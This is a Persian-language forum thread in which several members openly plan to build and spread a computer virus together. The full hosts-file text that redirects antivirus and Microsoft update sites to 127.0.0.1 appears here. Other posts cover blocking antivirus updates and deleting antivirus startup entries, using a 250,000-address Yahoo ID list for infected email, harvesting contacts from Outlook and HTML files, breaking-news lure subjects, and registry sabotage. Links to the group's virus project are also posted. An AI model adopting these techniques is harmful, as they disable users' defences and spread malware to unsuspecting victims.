ايران ويج

arnh نوشته است:جواد جان هم بدنه ويروس . و اين طرح پوسته خودش.
بقيه بچه ها خودشون كارشون رو انتخاب كنند.
اينطوري هم جلو مي افتيم . و هم كار تقسيم مي شه .

خوبه خیلی عالیه
بیاد یکمی شفاف سازی کنیم
من میخوام به فضایی به وجود باید که بقیه اطلاعت فنی که ردو بدل میشه جلوی چشم همه نباشه
نه که فقط ما ببینیم فعلا اعضای تیم "کسایی که در حال حاظر دارند فعالیت می کنند" و بعدا که ویروسه بیرون اومد و همه گیر شد مطالب رو باز کنید که هم از گفته هامون و کد ها بقیه استفاده کنند و چیز یاد بگیرند
من همش می خوام کد بزارم میگم فعلا ولش کن قضیه لو میره
ا
ین طوری فردای اون روزی که ویروسه اومد بیرون کافیه فقط یک نفر بفهمه ویروسه چیکارست اونوقت همه زحماتون به باد میره بعدش هم ویروس خوشگله هنوز اسم نداره و من همش مجبورم بگم "ویروسه"هنوز هم هدف نهایی مشخص نیست قراره چه پیغامی بده ؟ (+ یکم خراب کاری)

راستی یک نفر هم باید روش بخش زیر کار کنه:
فرضا چند وقتی از انتشار ویروس گذشت و همه تو بوق کردند آنتی هاتون رو به روز کنید. اگر بشه کاری کرد که جلوی به روز شدن آنتی رو هم گرفت باز ویروس میره جلوی صف

راستی قراره ضربه کاری بزنیم یا اینکه ویروسه یواش یواش خودش رو نشون بده رو سیستم کاربر

Creates or overwrites the file, %System%\drivers\etc\hosts, with the text:

* 127.0.0.1 www.symantec.com
* 127.0.0.1 securityresponse.symantec.com
* 127.0.0.1 symantec.com
* 127.0.0.1 www.sophos.com
* 127.0.0.1 sophos.com
* 127.0.0.1 www.mcafee.com
* 127.0.0.1 mcafee.com
* 127.0.0.1 liveupdate.symantecliveupdate.com
* 127.0.0.1 www.viruslist.com
* 127.0.0.1 viruslist.com
* 127.0.0.1 viruslist.com
* 127.0.0.1 f-secure.com
* 127.0.0.1 www.f-secure.com
* 127.0.0.1 kaspersky.com
* 127.0.0.1 www.avp.com
* 127.0.0.1 www.kaspersky.com
* 127.0.0.1 avp.com
* 127.0.0.1 www.networkassociates.com
* 127.0.0.1 networkassociates.com
* 127.0.0.1 www.ca.com
* 127.0.0.1 ca.com
* 127.0.0.1 mast.mcafee.com
* 127.0.0.1 my-etrust.com
* 127.0.0.1 www.my-etrust.com
* 127.0.0.1 download.mcafee.com
* 127.0.0.1 dispatch.mcafee.com
* 127.0.0.1 secure.nai.com
* 127.0.0.1 nai.com
* 127.0.0.1 www.nai.com
* 127.0.0.1 microsoft.com
* 127.0.0.1 www.microsoft.com
* 127.0.0.1 support.microsoft.com
* 127.0.0.1 update.symantec.com
* 127.0.0.1 updates.symantec.com
* 127.0.0.1 us.mcafee.com
* 127.0.0.1 liveupdate.symantec.com
* 127.0.0.1 customer.symantec.com
* 127.0.0.1 rads.mcafee.com
* 127.0.0.1 trendmicro.com
* 127.0.0.1 www.trendmicro.com
* 127.0.0.1 localhost

متن بالایی رو اگه انجام بدین ، اگه طرف اسم هر کدوم از سایت ها رو بزنه به 127.0.0.1 می ره!

راستی تو اون سورس که اول گذاشتم ( اگه می خوندید) مطالب جالبی برای کار انداختن یه سری آنتی هست
ولی مشکل من با هوش مصنوعیه
چون قبل تز باز شدن ویروس میگه یه ویروس ناشناخته!

Darg نوشته است:چرا پوسته روش جدیدیه برای تغییر امضاء
درمورد حافظه هم دنبالش هستم کلی مطلب گیر آوردم چکیدش رو بعدا میزارم بقیه هم استفاده کنند

می فهمم منظورت چیه ولی حرف من اینه که اگه یهو تو حافظه اجرا شه این کار فایده داره در غیر این صورت بازم همون آشه همون کاسه .

راستی تو نوشته هات خوندم که یه کمپرسور نوشتی که 90% حجم فایلو کم میکنه . اگه میشه اونو بزار .

در مورد انتشارم یکی از دوستام یه دیتابیس 250000 تایی از آی دی های یاهو داره که اگه بخواین میتونم براتون بگیرم که برای شروع از ارسال میل های آلوده استفاده کنیم.
در مورد بقیه کار هم ویروس می تونه ایمیل های توی کامپیوتر طرف رو کش بره . مثلا با آنالیز کردن صفحات html که بازه یا آدرس بوک اوت لوک و ... . و به همین ترتیب میتونه خودشو پخش کنه .

البته این فقط یه نظریه است و راه هایی دیگه ای هم میتونه باشه که احتمالا دوستان به زودی مطرح میکنند یا در نظر دارن .

راستی منم تحویل بگیرید :

---

اینم اینک همونه

»
http://www.crazyangel.persiangig.com/doc...0eRROR.rar

rRezar نوشته است:متن بالایی رو اگه انجام بدین ، اگه طرف اسم هر کدوم از سایت ها رو بزنه به 127.0.0.1 می ره!

منظورت از زدن اسم سایت چیه ؟ منظورت تو بروزره ؟
یا کلا . مثلا اگه با یه وینساک هم به سایت وصل شی این کارو میکنه ؟؟؟

rRezar نوشته است:راستی تو اون سورس که اول گذاشتم ...

اون لینکی که گذاشتی در پروژش مشکل وجود داره "فایل .bas و .frm و .res رو نزاشتی"
فایل اجرایش رو هم باز کردم اتفاقی نیافتاد. البته تا اینجا که هنوز سیستمم ری سیت نشده و یک ربع هم از اجراش میگزره همین طور از طریق TaskManager هم بسته نمیشه !

rRezar نوشته است:چون قبل تز باز شدن ویروس میگه یه ویروس ناشناخته!

کی میگه ویروس ناشناخته ؟ (پیغام میده)
منظورت از باز شدن چیه "از بسته فشرده باز شدن" ؟

rRezar نوشته است:ولی مشکل من با هوش مصنوعیه

با کدوم قسمتش مشکل داری
مگه نه اینکه طراحی الگوریتم همون هوش مصنوعیه حالا هر چی الگوریتم پیچیده تر باشه اصلاح کاربردیش میشه هوش مصنوعی برتر

rRezar نوشته است:متن بالایی رو اگه انجام بدین ، اگه طرف اسم هر کدوم از سایت ها رو بزنه به 127.0.0.1 می ره!

میشه کمی بیشتر توضیح بدی
حقیقتش رو بخوای من یکی از شبکه چیز زیادی سر در نمی یارم (البته برنامه برای یادگیری حرفه ایش دارم)

armin_b00ter نوشته است:تو نوشته هات خوندم که یه کمپرسور نوشتی که 90% حجم فایلو کم میکنه . اگه میشه اونو بزار .

الگوریتمش خیلی ساده تر از اونیه که فکرش رو کنی و البته فقط در یک موارد خاص کار میکنه و اون درصد بالای فشرده سازی رو انجام میده.
اگر دقت کرده باشی فایل ابتدایی رو دست کاری کردم (اضافاتش رو حذف کردم و به جاشون از کاراکتر اسکی کد صفر استفاده کردم) به این ترتیب اون کمپرسور خوب کار کرد
فعلا جاش نیست در فاز بعدی Cortex پوسته کد اون روهم باید روی ویروس سوار کرد میبینی چقدر خنده دار و سادست.

armin_b00ter نوشته است:در مورد انتشارم یکی از دوستام یه دیتابیس 250000 تایی از آی دی های یاهو داره که اگه بخواین میتونم براتون بگیرم که برای شروع از ارسال میل های آلوده استفاده کنیم.
در مورد بقیه کار هم ویروس می تونه ایمیل های توی کامپیوتر طرف رو کش بره . مثلا با آنالیز کردن صفحات html که بازه یا آدرس بوک اوت لوک و ... . و به همین ترتیب میتونه خودشو پخش کنه .

بک جا یک نفر گفت: اگر نامه از دوستاتون بیاد حتما باز می کنید (فکر کنم Iron_Fist بود یا arnh درست خاطرم نیست)
اما اگر ایمیل از طرف شخص دیگه ای باشه طرف ابتدا به عنوان نامه توجه میکنه تا تصمیم به بازکردنش بگیره. در مورد عنوان هم یک مورد گفتم "عناوین خبر فوری" جهان.
یعنی خبری که هر کس در هر لحظه منتظر شنیدنشه. وقایعی که اگر اتفاق بیافته رسانه ها تو بوق میکنند.

اسکن فایل های Html,txr,doc,eml,csv,cfm,php و ... هم معمول کار ویروس ها و کرم هاست برای فرستادن ایمیل و انجام امر خطیر تولید مثل

Darg نوشته است:می خوام تو رجیستری خراب کاری کنه که باوجود اینکه ویندوز طرف بالا میاد به اینترنت وصل مبشه و همه چیزش سره جاشه, اشک کاربر دربیاد و خودش با این همه مجبور بشه ویندوز رو عوض کنه !!!  

جواد جان .
كاري به ريجستري نداشته باش .
يا اصلا توي بدنه ويروس از سيستم ريجستري استفاده نكن.
اينطوري . خيلي بهتره .
الان اغلب ويروس ها يا همه بد وارها از ريجستري استفاده مي كنند.
ما نبايد اين كار رو به كنيم.
چون در صورتي كه يه آنتي ويروس بخواد جلوي ثبت در ريجستري رو بگيره . اون موقع ويروس مي سوزه.
بهتره كه از طريق خود ويروس توي ريجستري كاري نكنيم.
يا اگه مي خوايم حال كاربر رو با دستكاري توي ريجستري بگيريم.
بايد از طريق ويروس يه اسكريپت تر و تميز كه قبلا خوب روش كار شده رو دانلود كنه و اونو اجرا . كنه
فك كنم اينطوري بهتر باشه .
نظر خودت چيه .
اگه يه ويروس . واقعا ويروس باشه .
يعني از طريق فايل ها انتشار پيدا كنه .
خيلي بهتر مي شه.
-----------
راستي اگه كسي باگ جديدي توي ويندوز سراغ داره . و طرحي براي اون داره
لطفا بيان كنه.
نظر شما چيه ؟

Darg نوشته است:بیاد یکمی شفاف سازی کنیم
من میخوام به فضایی به وجود باید که بقیه اطلاعت فنی که ردو بدل میشه جلوی چشم همه نباشه
نه که فقط ما ببینیم فعلا اعضای تیم "کسایی که در حال حاظر دارند فعالیت می کنند" و بعدا که ویروسه بیرون اومد و همه گیر شد مطالب رو باز کنید که هم از گفته هامون  و کد ها بقیه استفاده کنند و چیز یاد بگیرند
من همش می خوام کد بزارم میگم فعلا ولش کن قضیه لو میره
این طوری فردای اون روزی که ویروسه اومد بیرون کافیه فقط یک نفر بفهمه ویروسه چیکارست اونوقت همه زحماتون به باد میره بعدش هم ویروس خوشگله هنوز اسم نداره و من همش مجبورم بگم "ویروسه"هنوز هم هدف نهایی مشخص نیست قراره چه پیغامی بده ؟ (+ یکم خراب کاری)

باشه چشم.
اون امكاناتي كه قرار بود آقا اشكان در اختيار تيم قرار بده .
يكيش معلوم شد.
بچه ها مي خوان . تا وقتي كه ويروس به صورت كامل بيرون نيومده خصوصي كار كنن
البته اشتباه نشه.
بعد از انتشار ما سورس رو در اختيار همه قرار مي ديم !!
ولي نمي دونم. نظر شما چيه

Darg نوشته است:راستی یک نفر هم باید روش بخش زیر کار کنه:
فرضا چند وقتی از انتشار ویروس گذشت و همه تو بوق کردند آنتی هاتون رو به روز کنید. اگر بشه کاری کرد که جلوی به روز شدن آنتی رو هم گرفت باز ویروس میره جلوی صف

مي خواي همه آنتي ويروس هاي رو سيستم رو پاك كنيم .
يا اينكه استارت آپشون رو از توي ريجستري پاك كنيم.
خيلي طرح وجود.

Darg نوشته است:راستی قراره ضربه کاری بزنیم یا اینکه ویروسه یواش یواش خودش رو نشون بده رو سیستم کاربر

من يه طرح جديد دارم . هم ويروس بنويسم و هم هك كنيم .
يعني ويروس ما به يه جايي ضربه بزنه . يه سايت خيلي معتبر
و البته خبري !!

راستي يادم رفت بگم.
اينطوري . ظرفيت ويروس خيلي خيلي كم مي شه !

rRezar نوشته است:

armin_b00ter نوشته است:[quote=rRezar]
متن بالایی رو اگه انجام بدین ، اگه طرف اسم هر کدوم از سایت ها رو بزنه به 127.0.0.1 می ره!

منظورت از زدن اسم سایت چیه ؟ منظورت تو بروزره ؟
یا کلا . مثلا اگه با یه وینساک هم به سایت وصل شی این کارو میکنه ؟؟؟

آره با وينساك هم نميره

اون فايل پيوست رو هم درستش مي كنم

DarG نوشته است:کی میگه ویروس ناشناخته ؟ (پیغام میده)
منظورت از باز شدن چیه "از بسته فشرده باز شدن" ؟

بعد از اين که فايل ويروس از تو ريسورس باز مي شه
(دقيقا قبل از شروع دستور Shell تو پوسته)

---

اينم لينک فايل پروژه سالم:

http://www.crazyangel.persiangig.com/doc...0eRROR.rar

پيوست هم کردمش:
[attachment=74]

منتظر نظراتتونم؟!

برنامت رو دیدم خیلی عالی بود. بخصوص چند تا تابع به درد بخور درش بود که من دنبالش بودم. ولی برای تکثیرش در شبکه از راه خوبی استفاده نکردی "دیدی که تجریش بسته شد" در کل خیلی خوب بود.
راستی TaskKill به وسیله Shell رو هم از برناهه شما یاد گرفتم. ممنون

راستی درباره Cortex که گذاشته بودم rRezar گفته قبل از دستوز Shell آنتی ویروس گیرمیده میگه ویروس ناشناخته !!!
اولا که بگو آنتی ویروست چی هست ؟
دوما مگه برنامه من "هسته و پوسته" کارخلافی انجام میدند که آنتی بهشون گیر بده. اون برنامه ای که گذاشته بودم فقط پیغام مبده "من ویروسم !" همین !!!